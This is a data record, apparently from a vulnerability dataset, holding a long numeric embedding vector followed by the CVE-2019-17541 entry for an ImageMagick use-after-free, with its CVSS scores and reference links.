-0.014985371381044388, -0.017600268125534058, 0.0031069861724972725, 0.0019054984441027045, -0.0009365857113152742, -0.03514306619763374, 0.016350289806723595, 0.001785170054063201, 0.002938167192041874, 0.01758590154349804, 0.009927988052368164, 0.0032614374067634344, -0.007352601736783981, -0.009978274814784527, -0.00790934544056654, 0.002668775385245681, -0.007129904814064503, 0.02288753353059292, 0.0049280752427875996, 0.01415205281227827, -0.010423669591546059, 0.02507140301167965, 0.007399296388030052, 0.004145042970776558, 0.0022359525319188833, -0.007614810019731522, 0.0020994606893509626, -0.007930896244943142, 0.0005046607693657279, -0.00022078907932154834, -0.005305223632603884, 0.023548441007733345, 0.005725475028157234, 0.0004947830457240343, -0.0024119552690535784, -0.0008764215162955225, 0.003559564473107457, 0.008110490627586842, 0.0060128262266516685, 0.01469083596020937, 0.01048832293599844, -0.011177966371178627, 0.0034374401438981295, -0.0031375172547996044, 0.01893645152449608, 0.027844343334436417, 0.008814501576125622, -0.007916528731584549, 0.0006011928198859096, -0.001073077553883195, 0.010567344725131989, 0.006698877550661564, 0.007280764169991016, 0.009037199430167675, 0.012004101648926735, 0.013721025548875332, -0.005635677836835384, 0.013871884904801846, -0.0017941498663276434, 0.012176512740552425, -0.011896344833076, 0.000035357683373149484, -0.015775587409734726, -0.004299493972212076, -0.00011797119077527896, 0.006688102148473263, 0.01384314987808466, -0.02535875327885151, 0.006041561719030142, 0.00487060472369194, 0.015172149986028671, -0.021910538896918297, -0.024022569879889488, 0.013369020074605942, -0.003588299732655287, 0.0110558420419693, 0.007140680216252804, 0.0008710336987860501, 0.022068582475185394, -0.0005028648301959038, 0.013383387587964535, -0.03453962877392769, -0.009561615064740181, 0.015071576461195946, 0.00674198055639863, 0.004917299374938011, -0.00008536355016985908, 0.0018255788600072265, -0.004457537550479174, 0.016565803438425064, -0.01504284143447876, 0.01899392157793045, -0.0043569644913077354, 0.013117588125169277, -0.001501410617493093, -0.007650728803128004, 0.02055998705327511, 0.00003095200372627005, 0.015718117356300354, -0.005100485868752003, -0.0017663126345723867, 0.007981183007359505, -0.00960471760481596, -0.0142957279458642, -0.003432052442803979, -0.020301371812820435, -0.010718204081058502, -0.000482660427223891, 0.0010649958858266473, -0.015631912276148796, 0.010610447265207767, 0.0013020606711506844, -0.019870344549417496, -0.014360382221639156, -0.017499694600701332, -0.003460787469521165, 0.014583079144358635, 0.007686648052185774, 0.03275804966688156, 0.0024424863513559103, -0.000020653376850532368, -0.009238344617187977, 0.01843358762562275, -0.03928092494606972, 0.0036242185160517693, -0.0035236456897109747, 0.04816007986664772, 0.024266818538308144, 0.005556656047701836, 0.005743434652686119, 0.025789780542254448, 0.004935258999466896, -0.01168083120137453, 0.005287264473736286, -0.02096227928996086, 0.015488236211240292, -0.020732397213578224, 0.007169415708631277, -0.01091216690838337, 0.006935942452400923, 0.009223977103829384, -0.0018857429968193173, 0.0004947830457240343, 0.006720428820699453, -0.0010964248795062304, -0.010948085226118565, 0.0031734362710267305, 0.019295642152428627, 0.016551436856389046, 0.009590350091457367, 0.006874880287796259, 0.00718378322198987, -0.0027944915927946568, -0.03497065603733063, -0.007938080467283726, -0.007794404402375221, 0.01451124157756567, 0.003983407747000456, 0.04643597453832626, -0.01344804186373949, 0.003038740251213312, 0.002956126816570759, 0.020430678501725197, -0.01702556572854519, 0.0001621963456273079, -0.0021587267983704805, 0.025732310488820076, -0.013864701613783836, -0.012370474636554718, 0.011501236818730831, 0.019654830917716026, -0.003994183149188757, 0.005046607460826635, 0.007729750592261553, 0.01729854941368103, -0.021292733028531075, 0.0005549472407437861, 0.0010317708365619183, -0.014927901327610016, -0.00630017789080739, 0.020301371812820435, 0.009848966263234615, -0.00385769153945148, -0.00039353661122731864, -0.0017321896739304066, -0.003600871190428734, -0.0009181772475130856, -0.01942494884133339, -0.011300090700387955, -0.006903615314513445, 0.0068245939910411835, -0.0010191992623731494, 0.00080727762542665, -0.00014670632663182914, 0.004259983543306589, -0.0009231161093339324, -0.013893436640501022, -0.014338831417262554, -0.02922363020479679, 0.0006029888172633946, 0.014389117248356342, 0.005840415600687265, -0.006871288642287254, 0.01610604114830494, 0.022011110559105873, -0.0051759155467152596, 0.002641836181282997, -0.009784312918782234, 0.004601213149726391, -0.019539890810847282, 0.0053411428816616535, -0.016652008518576622, -0.0015867181355133653, -0.014101766049861908, 0.0030118010472506285, -0.005448899231851101, -0.01708303578197956, 0.01317505817860365, 0.00727358041331172, -0.0066449991427361965, -0.02287316508591175, 0.0005773965385742486, 0.012219615280628204, -0.03235575929284096, -0.004321045707911253, 0.03298793360590935, -0.006688102148473263, -0.015675013884902, 0.03071785718202591, -0.00603796960785985, -0.0020330105908215046, -0.0005042117554694414, -0.01969793252646923, 0.0020276226568967104, 0.0043390048667788506, 0.007629177533090115, -0.00025233038468286395, -0.005639269482344389, 0.0031572727020829916, 0.011996917426586151, 0.007162231486290693, 0.013038566336035728, 0.004813134670257568, -0.020646192133426666, -0.0007812363910488784, 0.00034706652513705194, 0.025258181616663933, 0.01872093789279461, 0.019870344549417496, -0.022686386480927467, -0.011989734135568142, -0.009015647694468498, -0.005711107514798641, -0.006544426549226046, -0.025962192565202713, -0.011831690557301044, -0.010825960896909237, 0.004856237210333347, 0.0035038902424275875, 0.018333014100790024, 0.002020438900217414, -0.0003102496266365051, 0.016766950488090515, -0.001091037061996758, -0.04370613768696785, 0.015847425907850266, 0.006296585779637098, -0.001424185000360012, 0.001105404575355351, -0.012679376639425755, -0.014324462972581387, -0.012535701505839825, 0.004116307478398085, 0.009087485261261463, 0.004583253525197506, -0.018965186551213264, -0.00418096175417304, 0.018591631203889847, -0.0022844430059194565, 0.025373121723532677, 0.02930983528494835, 0.004726929124444723, -0.008900707587599754, 0.003983407747000456, -0.0015750444727018476, -0.005186691414564848, 0.0013343876926228404, -0.007022147998213768, -0.009195242077112198, 0.02140767313539982, 0.004658683203160763, 0.011989734135568142, -0.010790042579174042, -0.021651921793818474, 0.0006011928198859096, 0.024324288591742516, 0.021723760291934013, 0.01190352812409401, -0.002119215903803706, -0.005894294008612633, -0.008563069626688957, -0.005919437389820814, -0.008864788338541985, -0.01702556572854519, -0.009403572417795658, -0.011472501792013645, 0.01387906912714243, -0.01313195563852787, 0.0069862292148172855, 0.0016971688019111753, -0.01956862583756447, -0.018878981471061707, 0.004525783471763134, -0.02456853725016117, -0.01380004733800888, -0.008426577784121037, 0.005675188731402159, 0.011034291237592697, 0.021838700398802757, 0.021163424476981163, -0.027571359649300575, 0.013972458429634571, 0.01017223671078682, 0.001471777562983334, -0.02061745710670948, 0.011587441898882389, -0.01016505341976881, -0.0024784051347523928, 0.005905069876462221, -0.02512887306511402, -0.012557253241539001, -0.010279993526637554, -0.0018641917267814279, -0.007995550520718098, 0.01543076615780592, -0.00471256161108613, 0.023950733244419098, 0.0010784654878079891, 0.01013631746172905, -0.011515604332089424, -0.037528082728385925, -0.008555885404348373, 0.006946718320250511, -0.011996917426586151, 0.02428118698298931, -0.016364658251404762, -0.01344804186373949, -0.021738126873970032, 0.014310095459222794, 0.02196800895035267, -0.01472675520926714, -0.017988191917538643, -0.019468052312731743, -0.007636361289769411, 0.010265626013278961, 0.00015400235133711249, -0.023390397429466248, -0.018203705549240112, 0.021924905478954315, 0.00836910679936409, -0.012578804045915604, 0.021651921793818474, 0.0022862390615046024, -0.010502690449357033, -0.0010227911407127976, -0.0016019836766645312, -0.00572188338264823, -0.025789780542254448, -0.04175214841961861, -0.013562981970608234, -0.0025825700722634792, -0.01193226408213377, -0.010100399143993855, 0.012621906585991383, 0.02048814855515957, -0.00925271213054657, -0.0035434009041637182, -0.010768490843474865, 0.021422041580080986, 0.006587529089301825, 0.030631650239229202, -0.01543076615780592, -0.008498415350914001, 0.004155818372964859, 0.014123317785561085, -0.03226955235004425, -0.00857743714004755, -0.020861705765128136, -0.0129164420068264, -0.003130333498120308, 0.013922171667218208, -0.00021742167882621288, -0.008182329125702381, 0.012657825835049152, 0.015100312419235706, -0.020387576892971992, 0.02034447342157364, -0.0011745485244318843, -0.02126399800181389, -0.005585391540080309, 0.0060164183378219604, 0.0062355236150324345, -0.012348922900855541, 0.018605997785925865, 0.0043282294645905495, 0.008081755600869656, -0.01942494884133339, 0.007420848123729229, -0.011688015423715115, -0.03545915335416794, -0.018548527732491493, -0.01281586941331625, -0.016752582043409348, -0.025603001937270164, 0.0027262456715106964, -0.003288376610726118, 0.021422041580080986, 0.006666550878435373, -0.011752668768167496, 0.00638997508212924, -0.008196696639060974, 0.010818777605891228, 0.01383596658706665, -0.0060307858511805534, 0.00034571957075968385, -0.00800991803407669, -0.008340371772646904, -0.0004256391548551619, -0.03793037310242653, 0.005930212792009115, -0.006224748212844133, -0.006379199214279652, -0.008333188481628895, -0.006185237318277359, -0.002262891735881567, 0.0041486346162855625, 0.0016585559351369739, 0.016393393278121948, -0.013088853098452091, -0.008965360932052135, 0.007780036889016628, -0.020315738394856453, 0.005847599357366562, 0.00932455062866211, -0.016364658251404762, 0.013591717928647995, -0.001882151118479669, -0.010869063436985016, -0.01084032841026783, 0.03218334913253784, 0.024554170668125153, -0.003085434902459383, -0.023821424692869186, 0.005262121092528105, -0.03557409346103668, 0.029266731813549995, 0.010596079751849174, -0.006659367121756077, -0.018060030415654182, -0.009971090592443943, 0.00823261495679617, -0.004493456333875656, -0.00042496566311456263, -0.014482506550848484, 0.016623273491859436, -0.004586845636367798, -0.012011284939944744, 0.008735479786992073, 0.012011284939944744, -0.0012778154341503978, 0.010689469054341316, 0.009274263866245747, 0.006213972344994545, 0.00862053968012333, 0.019381847232580185, 0.01596236601471901, -0.000032607640605419874, 0.013081668876111507, 0.010940901935100555, -0.00471256161108613, -0.00559616694226861, -0.00610621552914381, 0.0012445903848856688, 0.015488236211240292, 0.008570252917706966, -0.010998371988534927, -0.005976907443255186, -0.018275544047355652, 0.01969793252646923, 0.005642861593514681, -0.00826135091483593, 0.015100312419235706, 0.00942512322217226, 0.006889247801154852, 0.004234840162098408, 0.005944580305367708, 0.018864614889025688, -0.0007116434862837195, -0.012679376639425755, -0.004015734884887934, 0.0005612330278381705, -0.02103411592543125, -0.002548447111621499, -0.01048113964498043, 0.0020186430774629116, -0.026421954855322838, -0.0018273747991770506, -0.0235915444791317, 0.02420934848487377, 0.0002738817420322448, -0.020861705765128136, -0.019094495102763176, -0.010078847408294678, -0.005804496817290783, 0.019381847232580185, -0.03169485181570053, 0.006932350806891918, -0.02303120866417885, -0.025229446589946747, 0.014288544654846191, 0.004331821110099554, -0.018821511417627335, -0.01101992279291153, 0.007155047729611397, -0.02492772787809372, -0.006738388445228338, 0.0037391590885818005, -0.0036134428810328245, 0.008196696639060974, -0.005010688677430153, -0.023117413744330406, -0.006034377962350845, -0.0070868018083274364, -0.024942094460129738, 0.010617631487548351, 0.01836174912750721, -0.04186708852648735, 0.0013721025316044688, 0.00023302396584767848, -0.02146514318883419, 0.004026510287076235, -0.009432307444512844, -0.01778704673051834, 0.005423756316304207, 0.007406480144709349, -0.0019342335872352123, 0.0032021712977439165, -0.0047951750457286835, 0.0017501491820439696, 0.010603263974189758, 0.004184553399682045, -0.023347295820713043, 0.003622422693297267, 0.007155047729611397, -0.009920804761350155, -0.000018352320694248192, -0.004094756208360195, 0.01144376676529646, -0.012751215137541294, 0.025603001937270164, 0.007643545046448708, 0.02613460272550583, 0.008067388087511063, -0.002929187612608075, -0.004461129195988178, 0.016278453171253204, 0.006188828963786364, -0.009963907301425934, 0.020315738394856453, -0.008476863615214825, 0.004629948176443577, 0.0013828782830387354, -0.004978361539542675, -0.028419045731425285, 0.019238170236349106, 0.0017941498663276434, -0.004213288892060518, -0.02146514318883419, 0.004155818372964859, 0.03384998440742493, 0.02316051721572876, -0.01764337159693241, -0.00104524043854326, 0.021220894530415535, 0.03313160687685013, 0.02041631191968918, 0.017700841650366783, -0.01221243105828762, -0.016292819753289223, -0.008950993418693542, -0.013440857641398907, 0.014985371381044388, -0.0027926957700401545, 0.006005642469972372, 0.020215164870023727, 0.005901477765291929, 0.025646105408668518, 0.005452491343021393, -0.014453771524131298, 0.0011449154699221253, -0.011486869305372238, 0.007463950663805008, 0.011027107015252113, 0.005484818480908871, 0.008591804653406143, 0.015143414959311485, -0.009216793812811375, -0.005650045350193977, 0.0006258870707824826, -0.017844516783952713, 0.013167873956263065, -0.012988279573619366, -0.016422128304839134, 0.00016724744637031108, -0.006501323543488979, 0.016264084726572037, 0.0026903266552835703, -0.01538766361773014, 0.01348396111279726, 0.014389117248356342, 0.007327458821237087, 0.015186517499387264, 0.012636274099349976, -0.006131358910351992, 0.013218160718679428, -0.015186517499387264, -0.0022395444102585316, -0.008203879930078983, 0.016005469486117363, -0.0068533290177583694, 0.0026903266552835703, 0.025229446589946747, 0.015488236211240292, -0.006407934706658125, 0.00619601272046566, -0.0022233808413147926, -0.01150842010974884, 0.004076797049492598, 0.005219018552452326, -0.007815956138074398, -0.01394372247159481, 0.025947824120521545, 0.002487384947016835, -0.0029956374783068895, -0.022499607875943184, 0.0018237829208374023, -0.011838874779641628, 0.009180874563753605, 0.009065934456884861, -0.015344561077654362, -0.006878472398966551, 0.0025035482831299305, 0.0003347193996887654, 0.003159068524837494, 0.011292907409369946, -0.0016145552508533, 0.014065846800804138, 0.012471047230064869, 0.0023024023976176977, 0.005757802166044712, -0.006307361647486687, -0.008563069626688957, 0.015200885012745857, 0.020603090524673462, 0.0035469927825033665, 0.0018013336230069399, 0.002954330760985613, 0.001817497075535357, -0.011515604332089424, -0.013864701613783836, -0.0010236890520900488, 0.0018462322186678648, -0.003586503677070141, -0.01906576007604599, -0.008692377246916294, 0.011127679608762264, -0.006508507300168276, 0.021005380898714066, -0.004231248050928116, 0.018548527732491493, -0.024338657036423683, 0.011846058070659637, 0.002431710483506322, -0.015976732596755028, 0.008304453454911709, 0.010394933633506298, -0.004482680466026068, 0.00981304794549942, 0.00836192350834608, -0.016680743545293808, 0.012736847624182701, 0.004500640090554953, -0.0047089699655771255, 0.004471905063837767, -0.0035793199203908443, 0.01933874376118183, -0.0015876160468906164, 0.012162144295871258, 0.0018767633009701967, -0.005057383328676224, -0.00436055613681674, 0.016134776175022125, -0.012945177033543587, 0.007068842649459839, 0.03744187578558922, -0.025444960221648216, 0.002167706610634923, -0.016824420541524887, 0.015473868697881699, -0.006091848015785217, 0.011989734135568142, -0.0014403484528884292, -0.016537068411707878, -0.011831690557301044, -0.022700754925608635, -0.014475323259830475, 0.006709653418511152, 0.0064258938655257225, 0.02790181338787079, 0.004206105135381222, 0.004640724044293165, 0.013038566336035728, -0.009712474420666695, 0.006497731897979975, 0.003911569714546204, -0.0003975775034632534, -0.010007009841501713, -0.01299546379595995, 0.002282647183164954, 0.0026310605462640524, -0.013936539180576801, -0.0027460011187940836, -0.014784225262701511, 0.01841921918094158, 0.005294448230415583, 0.014216707088053226, -0.019396213814616203, -0.011163598857820034, 0.007478318177163601, -0.010014193132519722, -0.01119233388453722, 0.011264171451330185, 0.014008376747369766, 0.006285810377448797, -0.013426490128040314, 0.001627126825042069, 0.0022377483546733856, 0.018893349915742874, 0.0028052672278136015, -0.00667373463511467, -0.0191950686275959, -0.007744118105620146, 0.029180526733398438, 0.013649187982082367, -0.011975366622209549, 0.023821424692869186, 0.015660647302865982, -0.010919350199401379, -0.010617631487548351, -0.003951080609112978, -0.011357560753822327, 0.0032973564229905605, -0.008850420825183392, -0.009030015207827091, 0.004101939965039492, -0.032786786556243896, 0.014841696247458458, -0.008850420825183392, -0.01899392157793045, 0.019827241078019142, -0.022485241293907166, 0.0036152389366179705, 0.009655004367232323, 0.016077306121587753, -0.0011305478401482105, 0.021149057894945145, -0.004288718570023775, -0.022772591561079025, 0.003254253650084138, 0.007708199322223663, 0.010366198606789112, 0.008656458929181099, -0.016278453171253204, 0.009396388195455074, 0.0002200033632107079, 0.013009831309318542, -0.005229793954640627, -0.010229706764221191, -0.002487384947016835, 0.008534334599971771, -0.013074485585093498, 0.0108762476593256, 0.01158025860786438, -0.008132042363286018, -0.0021712984889745712, 0.006134950555860996, 0.0108762476593256, -0.00981304794549942, 0.02816043049097061, -0.0320684090256691, 0.006734796799719334, 0.0068245939910411835, -0.0178732518106699, -0.000030250461350078695, -0.013333101756870747, 0.0014681856846436858, -0.0008535232045687735, 0.00964063685387373, -0.0054273479618132114, -0.013440857641398907, -0.0191950686275959, -0.012478231452405453, -0.0311488825827837, -0.004888564348220825, 0.0004004959191661328, -0.002767552388831973, -0.0030423321295529604, 0.014841696247458458, -0.003004617290571332, 0.0020994606893509626, 0.005919437389820814, 0.006957493722438812, 0.00015815546794328839, -0.004651499446481466, 0.023419132456183434, -0.019151965156197548, 0.007801588624715805, -0.0030584956984966993, 0.0024604457430541515, 0.01211185846477747, -0.02020079828798771, -0.0106966532766819, 0.010423669591546059, -0.008850420825183392, -0.0171548742800951, -0.008211064152419567, -0.00924552883952856, 0.011666463688015938, -0.012327372096478939, 0.029712127521634102, -0.012198063544929028, -0.0034553995355963707, 0.012377657927572727, -0.0028088591061532497, -0.008318820968270302, -0.006752755958586931, -0.0031429051887243986, -0.0010389545932412148, -0.015904895961284637, 0.01632155478000641, -0.014640550129115582, 0.0012113654520362616, 0.0012499782023951411, -0.015718117356300354, 0.004482680466026068, 0.007514236960560083, -0.0024568538647145033, 0.02449670061469078, 0.012083123438060284, 0.0066054887138307095, 0.015488236211240292, -0.0024137510918080807, -0.005696740001440048, 0.005890701897442341, 0.009101852774620056, -0.0022682794369757175, 0.00531240738928318, -0.0014807572588324547, -0.0025035482831299305, 0.029051218181848526, 0.014618998393416405, -0.002717265859246254, 0.002834002487361431, -0.014130501076579094, 0.014029928483068943, 0.0015238600317388773, 0.006357647944241762, 0.011975366622209549, -0.005994867067784071, 0.000814910396002233, -0.01729854941368103, -0.008778583258390427, -0.0000831186116556637, -0.007564523722976446, -0.020631825551390648, -0.004813134670257568, -0.004827502183616161, 0.009719658643007278, 0.009568799287080765, 0.0221116840839386, -0.008290085941553116, -0.0003674954059533775, -0.013024198822677135, -0.0030261685606092215, 0.006246299482882023, -0.027226537466049194, -0.014482506550848484, -0.004744888748973608, 0.006576753221452236, 0.0030315564945340157, -0.007686648052185774, -0.012988279573619366, -0.004030102398246527, -0.006429485976696014, -0.010100399143993855, -0.015172149986028671, 0.007945263758301735, 0.009065934456884861, 0.00818951241672039, 0.0012221410870552063, 0.0027873078361153603, 0.007988366298377514, -0.028375942260026932, 0.0066449991427361965, -0.035344213247299194, 0.01729854941368103, 0.010323096066713333, -0.017470959573984146, -0.0005163344321772456, 0.002737021306529641, -0.012334555387496948, -0.02357717603445053, 0.001898314687423408, -0.003911569714546204, 0.018692202866077423, 0.02824663557112217, 0.012061571702361107, -0.0013819802552461624, 0.0018767633009701967, 0.011465317569673061, 0.0265512615442276, 0.006612672470510006, 0.009382020682096481, 0.00844094529747963, -0.004206105135381222, 0.010078847408294678, 0.002938167192041874, -0.00044674149830825627, 0.02054562047123909, 0.001629820792004466, 0.02287316508591175, -0.00946822576224804, -0.004335413221269846, -0.017485328018665314, -0.007180191110819578, -0.0006222951924428344, 0.015186517499387264, 0.012011284939944744, -0.0041342671029269695, -0.02435302548110485, -0.001328999875113368, 0.015488236211240292, 0.0023006065748631954, -0.02274385653436184, -0.032872989773750305, 0.016364658251404762, 0.00231138220988214, 0.010926534421741962, -0.002735225483775139, 0.0016792092937976122, -0.004633540287613869, -0.006149318069219589, -0.005725475028157234, -0.007880610413849354, 0.008246983401477337, 0.013160690665245056, 0.006731204688549042, 0.005409388802945614, 0.03448215872049332, 0.005359102040529251, 0.010919350199401379, -0.00596972368657589, 0.012277085334062576, -0.007137088570743799, 0.0025197118520736694, -0.021493878215551376, -0.0017438633367419243, 0.008239799179136753, 0.0008436455391347408, -0.019539890810847282, 0.01229145284742117, 0.00328478473238647, 0.005851191468536854, -0.0006923371111042798, 0.011709566228091717, -0.009346101433038712, 0.007370561361312866, 0.004471905063837767, 0.006982637103646994, 0.008282901719212532, 0.0055602481588721275, -0.013922171667218208, -0.006519283168017864, 0.02428118698298931, 0.013864701613783836, 0.007413663901388645, 0.03522927314043045, 0.004101939965039492, -0.00858462043106556, 0.01104865875095129, 0.016134776175022125, -0.026091499254107475, 0.00040139388875104487, 0.02880696952342987, 0.008778583258390427, 0.014080215245485306, 0.010818777605891228, -0.0044288020581007, -0.008024285547435284, 0.016781317070126534, 0.010804410092532635, 0.0024909768253564835, 0.010086031630635262, 0.010452404618263245, -0.02512887306511402, -0.007313091307878494, -0.01716924086213112, 0.013598901219666004, 0.011817323043942451, -0.004191737622022629, -0.00395467272028327, -0.009130588732659817, 0.011846058070659637, 0.04928075149655342, 0.007751301862299442, 0.0002619836013764143, -0.012686560861766338, 0.00982023123651743, -0.04359119385480881, -0.01836174912750721, 0.015775587409734726, -0.006400750484317541, 0.010502690449357033, -0.00046739488607272506, -0.005344734527170658, 0.011336009949445724, -0.011357560753822327, -0.00021663596271537244, 0.003462583525106311, 0.016565803438425064, 0.016508333384990692, -0.01785888522863388, 0.010366198606789112, 0.011292907409369946, -0.015861792489886284, 0.0027442050632089376, 0.0010479344055056572, 0.008132042363286018, -0.006005642469972372, 0.002341913292184472, -0.01885024644434452, -0.006386382970958948, 0.002293422818183899, -0.015588808804750443, 0.012542884796857834, -0.028548354282975197, -0.014741122722625732, -0.01260753907263279, -0.006461812648922205, -0.005908661521971226, 0.01645086333155632, 0.0011727525852620602, 0.017456592991948128, -0.013383387587964535, -0.007801588624715805, -0.0068533290177583694, 0.005452491343021393, 0.010071664117276669, 0.005912253633141518, -0.026565629988908768, 0.00473411288112402, -0.0402291864156723, 0.010825960896909237, -0.0036601375322788954, 0.005984091199934483, -0.021450776606798172, -0.006594712845981121, 0.0012131613912060857, 0.020502516999840736, -0.021378938108682632, -0.018376117572188377, 0.016565803438425064, 0.0017285977955907583, 0.004777215886861086, 0.019151965156197548, 0.0060128262266516685, 0.015358928591012955, 0.027097228914499283, 0.007981183007359505, -0.015272722579538822, -0.00857743714004755, -0.009396388195455074, -0.0015050024958327413, 0.013656371273100376, -0.025157608091831207, -0.006314545404165983, -0.008153594098985195, -0.0026957145892083645, 0.010301545262336731, -0.012650641612708569, -0.009583166800439358, 0.00010854247375391424, 0.02117779292166233, 0.006303769536316395, -0.0007960529765114188, 0.011134863831102848, 0.001105404575355351, 0.004633540287613869, 0.00018767632718663663, -0.007320275064557791, -0.004227656405419111, -0.019439317286014557, 0.01645086333155632, -0.0049999128095805645, -0.012837420217692852, -0.027212170884013176, -0.000862502958625555, 0.0071909669786691666, 0.009439490735530853, -0.0199134461581707, 0.007244845386594534, 0.011910712346434593, -0.03571777045726776, 0.006095440126955509, -0.005772169679403305, 0.013606085442006588, 0.01362763624638319, 0.002370648318901658, 0.01729854941368103, 0.012765582650899887, 0.015459501184523106, 0.0019503971561789513, -0.019611727446317673, 0.005933804903179407, -0.019956549629569054, 0.00826135091483593, 0.010998371988534927, 0.0014026336139068007, -0.016407759860157967, 0.0020958688110113144, -0.03293045982718468, -0.022212257608771324, -0.00008497068483848125, 0.038447607308626175, 0.007528604473918676, 0.00610621552914381, -0.00911622028797865, -0.005229793954640627, -0.0037140159402042627, 0.003024372737854719, 0.007108353544026613, -0.0030153929255902767, -0.006307361647486687, 0.010438037104904652, -0.001582228229381144, -0.013613268733024597, -0.009971090592443943, 0.052930112928152084, 0.023835791274905205, 0.03146497160196304, -0.0012499782023951411, 0.001135935657657683, 0.02209731750190258, -0.01778704673051834, -0.010373382829129696, -0.009274263866245747, 0.013850334100425243, 0.013419306837022305, 0.005233386065810919, -0.0031734362710267305, -0.004382107872515917, -0.0021533388644456863, 0.012758398428559303, -0.007629177533090115, -0.009295815601944923, -0.009913620539009571, -0.01841921918094158, -0.014626182615756989, -0.005556656047701836, 0.016551436856389046, -0.01849105767905712, 0.005833231844007969, 0.005373469553887844, -0.004874196834862232, -0.011989734135568142, 0.013541431166231632, -0.003435644321143627, 0.026292646303772926, -0.01172393374145031, 0.003257845528423786, 0.001010219450108707, 0.001295774825848639, -0.004489864222705364, 0.011264171451330185, 0.016220981255173683, 0.0028214307967573404, -0.011529971845448017, -0.00028667785227298737, 0.026953553780913353, -0.009985458105802536, -0.014381933957338333, 0.0027711442671716213, -0.0021766861900687218, -0.01066073402762413, -0.018735306337475777, 0.01278713345527649, 0.011163598857820034, 0.019755402579903603, 0.0023742401972413063, -0.007887793704867363, 0.008836053311824799, -0.0015624727820977569, -0.010359015315771103, 0.004863420967012644, -0.0041630021296441555, -0.006400750484317541, -0.008634907193481922, -0.010567344725131989, -0.008879155851900578, -0.008505599573254585, 0.0051507726311683655, -0.017212344333529472, -0.007399296388030052, 0.012126225978136063, -0.0017690066015347838, -0.017269814386963844, 0.0034895227290689945, 0.0038936103228479624, 0.011041474528610706, -0.004489864222705364, -0.004687418229877949, -0.014346014708280563, -0.008203879930078983, 0.004540150985121727, -0.007485501933842897, 0.018519792705774307, -0.0007296029943972826, -0.003115965984761715, -0.01499973889440298, 0.020028386265039444, -0.009489777497947216, 0.015919262543320656, -0.008864788338541985, -0.017916355282068253, -0.02521507814526558, -0.012506966479122639, 0.02321798726916313, 0.008060204796493053, -0.001406225492246449, -0.013886252418160439, 0.0005122935399413109, -0.0009464634349569678, -0.022758224979043007, -0.0177152082324028, -0.0041055320762097836, -0.00316086458042264, 0.010114766657352448, 0.013821598142385483, 0.02527254819869995, -0.00893662590533495, -0.01295236125588417, -0.00003889344952767715, -0.008117674849927425, 0.003936713095754385, -0.014669285155832767, -0.006558794062584639, 0.007471134420484304, 0.010394933633506298, 0.0021730943117290735, -0.015804322436451912, -0.00826135091483593, 0.003511073999106884, -0.0020599497947841883, 0.003764302236959338, -0.014116133563220501, 0.006864104885607958, 0.014468139037489891, -0.019956549629569054, -0.014468139037489891, 0.03186726197600365, 0.016422128304839134, 0.006745572201907635, 0.006957493722438812, 0.0016361066373065114, 0.02124962955713272, 0.005046607460826635, 0.016680743545293808, -0.018246809020638466, -0.019037025049328804, 0.01729854941368103, 0.018692202866077423, -0.012004101648926735, 0.010394933633506298, -0.016149144619703293, -0.000655969197396189, 0.011336009949445724, 0.006364831700921059, -0.0036242185160517693, 0.04129238426685333, -0.0036439739633351564, 0.004220472648739815, -0.007076026406139135, 0.006468996871262789, -0.018979554995894432, 0.0020527660381048918, 0.017312917858362198, -0.019022658467292786, 0.00872111227363348, 0.012104674242436886, -0.01281586941331625, 0.001168262679129839, 0.0030171889811754227, 0.017255447804927826, 0.0120759392157197, 0.009331733919680119, -0.01560317724943161, -0.00019856425933539867, 0.014288544654846191, -0.0012023856397718191, 0.004274351056665182, -0.011106128804385662, -0.004094756208360195, 0.009216793812811375, -0.015775587409734726, -0.012858971953392029, 0.027298375964164734, -0.023605911061167717, -0.024597272276878357, -0.006558794062584639, -0.005592575296759605, -0.015014106407761574, 0.010179420933127403, 0.01281586941331625, 0.00893662590533495, 0.004259983543306589, 0.007657912559807301, 0.015646278858184814, 0.02478405088186264, -0.0008849522564560175, -0.008512782864272594, 0.012241166085004807, 0.042757876217365265, -0.01814623549580574, -0.01744222454726696, -0.019266905263066292, 0.0051902830600738525, -0.00002963310544146225, 0.005470450967550278, -0.020847339183092117, 0.0151146799325943, -0.010215339250862598, -0.014410668984055519, 0.020445046946406364, 0.020646192133426666, 0.0033314793836325407, 0.0304305050522089, 0.00024559558369219303, 0.006555201951414347, -0.025531165301799774, -0.026493791490793228, -0.007636361289769411 ]
98
CVE-2019-17541
2019-10-14T02:15:10.703000
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15827" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/39f226a9c137f547e12afde972eeba7551124493" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/compare/7.0.8-54...7.0.8-55" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1641" } ]
